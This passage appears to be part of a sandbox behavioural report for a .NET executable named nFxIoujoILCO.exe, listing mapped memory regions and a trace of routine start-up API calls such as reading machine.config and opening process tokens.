entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3250
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3251
start_va = 0x530000
end_va = 0x56bfff
monitored = 0
entry_point = 0x53128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3252
start_va = 0x74200000
end_va = 0x7423afff
monitored = 0
entry_point = 0x7420128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 3253
start_va = 0x4390000
end_va = 0x4411fff
monitored = 0
entry_point = 0x43919a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3254
start_va = 0x4420000
end_va = 0x445ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004420000"
filename = ""
Region:
id = 3255
start_va = 0x4390000
end_va = 0x4411fff
monitored = 0
entry_point = 0x43919a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3256
start_va = 0x74170000
end_va = 0x741f3fff
monitored = 0
entry_point = 0x741719a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 3257
start_va = 0x4900000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 3258
start_va = 0x4ab0000
end_va = 0x4aeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ab0000"
filename = ""
Region:
id = 3259
start_va = 0x430000
end_va = 0x43ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 3260
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 3261
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3262
start_va = 0x73fe0000
end_va = 0x7416ffff
monitored = 0
entry_point = 0x7407d026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 3263
start_va = 0x530000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3264
start_va = 0x4c0000
end_va = 0x4dbfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "gdipfontcachev1.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\gdipfontcachev1.dat")
Region:
id = 3265
start_va = 0x4950000
end_va = 0x498ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 3266
start_va = 0x4a60000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a60000"
filename = ""
Region:
id = 3267
start_va = 0x4e90000
end_va = 0x4f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 3268
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 3269
start_va = 0x4f90000
end_va = 0x508ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f90000"
filename = ""
Region:
id = 3270
start_va = 0x4460000
end_va = 0x450afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3271
start_va = 0x4460000
end_va = 0x450afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 3272
start_va = 0x5090000
end_va = 0x6538fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3273
start_va = 0x5090000
end_va = 0x6538fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msjh.ttf"
filename = "\\Windows\\Fonts\\msjh.ttf" (normalized: "c:\\windows\\fonts\\msjh.ttf")
Region:
id = 3274
start_va = 0x5090000
end_va = 0x6552fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3275
start_va = 0x5090000
end_va = 0x6552fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msyh.ttf"
filename = "\\Windows\\Fonts\\msyh.ttf" (normalized: "c:\\windows\\fonts\\msyh.ttf")
Region:
id = 3276
start_va = 0x5090000
end_va = 0x54b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3277
start_va = 0x5090000
end_va = 0x54b2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "malgun.ttf"
filename = "\\Windows\\Fonts\\malgun.ttf" (normalized: "c:\\windows\\fonts\\malgun.ttf")
Region:
id = 3278
start_va = 0x4460000
end_va = 0x44fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3279
start_va = 0x4460000
end_va = 0x44fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 3280
start_va = 0x4390000
end_va = 0x440efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3281
start_va = 0x4390000
end_va = 0x440efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 3282
start_va = 0x5090000
end_va = 0x528ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005090000"
filename = ""
Region:
id = 3283
start_va = 0x5290000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 3284
start_va = 0x4460000
end_va = 0x451cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3285
start_va = 0x4460000
end_va = 0x451cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 3286
start_va = 0x4460000
end_va = 0x4516fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3287
start_va = 0x4460000
end_va = 0x4516fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbd.ttf"
filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf")
Region:
id = 3288
start_va = 0x4390000
end_va = 0x4417fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3289
start_va = 0x4390000
end_va = 0x4417fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ariali.ttf"
filename = "\\Windows\\Fonts\\ariali.ttf" (normalized: "c:\\windows\\fonts\\ariali.ttf")
Region:
id = 3290
start_va = 0x4390000
end_va = 0x4419fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3291
start_va = 0x4390000
end_va = 0x4419fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arialbi.ttf"
filename = "\\Windows\\Fonts\\arialbi.ttf" (normalized: "c:\\windows\\fonts\\arialbi.ttf")
Region:
id = 3292
start_va = 0x5450000
end_va = 0x5d7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 3293
start_va = 0x430000
end_va = 0x430fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 3294
start_va = 0x6f890000
end_va = 0x6fcabfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "windowsbase.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\WindowsBase\\1a4cc316fb6d09525321fc0be44692d8\\WindowsBase.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\windowsbase\\1a4cc316fb6d09525321fc0be44692d8\\windowsbase.ni.dll")
Region:
id = 3295
start_va = 0x6ec50000
end_va = 0x6f88bfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationcore.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\PresentationCore\\468f4e17be144ca12a73a4297eacc9cc\\PresentationCore.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentationcore\\468f4e17be144ca12a73a4297eacc9cc\\presentationcore.ni.dll")
Region:
id = 3296
start_va = 0x6d860000
end_va = 0x6ec42fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "presentationframework.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\PresentationFramework.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\presentatio5ae0f00f#\\252cc7b0fae8cfe083bdc149957c0c54\\presentationframework.ni.dll")
Region:
id = 3297
start_va = 0xcf0000
end_va = 0xd51fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 3298
start_va = 0x4c0000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 3299
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3300
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3301
start_va = 0x530000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3302
start_va = 0x570000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 3303
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3304
start_va = 0x530000
end_va = 0x53ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 3305
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 3306
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3307
start_va = 0x4490000
end_va = 0x44cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004490000"
filename = ""
Region:
id = 3308
start_va = 0x5db0000
end_va = 0x5eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005db0000"
filename = ""
Region:
id = 3309
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 3310
start_va = 0x5eb0000
end_va = 0x6eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005eb0000"
filename = ""
Region:
id = 3311
start_va = 0x5290000
end_va = 0x53effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 3312
start_va = 0x5410000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005410000"
filename = ""
Region:
id = 3313
start_va = 0x6eb0000
end_va = 0x7eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006eb0000"
filename = ""
Region:
id = 3314
start_va = 0x7eb0000
end_va = 0x815ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007eb0000"
filename = ""
Region:
id = 3315
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 3316
start_va = 0x4e0000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Thread:
id = 74
os_tid = 0x534
[0273.016] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0273.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ebd0 | out: phkResult=0x16ebd0*=0x0) returned 0x2
[0273.620] RegCloseKey (hKey=0x80000002) returned 0x0
[0273.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x16ee54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77
[0273.645] IsAppThemed () returned 0x1
[0273.649] CoTaskMemAlloc (cb=0xf0) returned 0x705f58
[0273.649] CreateActCtxA (pActCtx=0x16f378) returned 0x70614c
[0273.657] CoTaskMemFree (pv=0x705f58)
[0273.668] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc104
[0273.668] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc105
[0273.942] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16ecd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0274.051] GetCurrentProcess () returned 0xffffffff
[0274.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f008 | out: TokenHandle=0x16f008*=0x1f0) returned 1
[0274.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x16eac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0274.073] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16f000 | out: lpFileInformation=0x16f000*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x16ea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16f008 | out: lpFileInformation=0x16f008*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x16ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16ef40) returned 1
[0274.081] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40
[0274.082] GetFileType (hFile=0x40) returned 0x1
[0274.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16ef3c) returned 1
[0274.082] GetFileType (hFile=0x40) returned 0x1
[0274.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x16e278, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x16e2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16e51c) returned 1
[0274.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16e7e0 | out: lpFileInformation=0x16e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e518) returned 1
[0274.222] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x16e6ac | out: pfEnabled=0x16e6ac) returned 0x0
[0274.299] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x16effc | out: lpFileSizeHigh=0x16effc*=0x0) returned 0x8c8e
[0274.300] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16efb8, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16efb8*=0x1000, lpOverlapped=0x0) returned 1
[0274.319] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ee68, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ee68*=0x1000, lpOverlapped=0x0) returned 1
[0274.322] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.323] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.324] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.325] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ec54, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ec54*=0x1000, lpOverlapped=0x0) returned 1
[0274.332] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16edc0, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16edc0*=0x1000, lpOverlapped=0x0) returned 1
[0274.334] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ecb4, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ecb4*=0x1000, lpOverlapped=0x0) returned 1
[0274.335] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ecb4, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ecb4*=0xc8e, lpOverlapped=0x0) returned 1
[0274.335] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed78, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed78*=0x0, lpOverlapped=0x0) returned 1
[0274.335] CloseHandle (hObject=0x40) returned 1
[0274.336] CloseHandle (hObject=0x1f0) returned 1
[0274.337] GetCurrentProcess () returned 0xffffffff
[0274.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.338] CloseHandle (hObject=0x1f0) returned 1
[0274.338] GetCurrentProcess () returned 0xffffffff
[0274.338] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.339] CloseHandle (hObject=0x1f0) returned 1
[0274.348] GetCurrentProcess () returned 0xffffffff
[0274.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f008 | out: TokenHandle=0x16f008*=0x1f0) returned 1
[0274.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16f000 | out: lpFileInformation=0x16f000*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0274.349] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16ea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0274.349] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16f008 | out: lpFileInformation=0x16f008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0274.349] CloseHandle (hObject=0x1f0) returned 1
[0274.350] GetCurrentProcess () returned 0xffffffff
[0274.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.350] CloseHandle (hObject=0x1f0) returned 1
[0274.352] GetCurrentProcess () returned 0xffffffff
[0274.352] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.353] CloseHandle (hObject=0x1f0) returned 1
[0274.389] GetCurrentProcess () returned 0xffffffff
[0274.389] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ef6c | out: TokenHandle=0x16ef6c*=0x1f0) returned 1
[0274.396] CloseHandle (hObject=0x1f0) returned 1
[0274.397] GetCurrentProcess () returned 0xffffffff
[0274.397] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ef84 | out: TokenHandle=0x16ef84*=0x1f0) returned 1
[0274.406] CloseHandle (hObject=0x1f0) returned 1
[0274.411] GetSystemMetrics (nIndex=75) returned 1
[0274.419] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0274.428] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b80000
[0274.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x16f250, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
